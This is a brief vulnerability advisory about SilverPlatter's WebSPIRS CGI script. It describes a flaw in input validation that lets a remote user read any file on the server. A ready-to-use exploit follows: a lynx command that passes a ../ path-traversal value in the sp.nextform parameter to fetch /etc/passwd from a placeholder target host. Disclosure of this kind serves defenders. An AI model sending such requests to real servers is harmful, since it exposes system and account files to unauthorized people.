Name   : WebSPIRS CGI script "show files" Vulnerability.
About  : WebSPIRS is SilverPlatter's Information Retrieval
         System for the World Wide Web (WWW). It is a common
         gateway interface (CGI) application which allows any
         forms-capable browser, such as Netscape, to search
         SilverPlatter (SP) Electronic Reference Library (ERL)
         databases available over the Internet.
         http://www.silverplatter.com.
Problem: Problem lyes in incorrect validation of user submitted
         -by-browser information, that can show any file of the
         system where script installed.

Exploit:

  lynx http://www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
                                                     by: UkR-XblP (cuctema@ok.ru)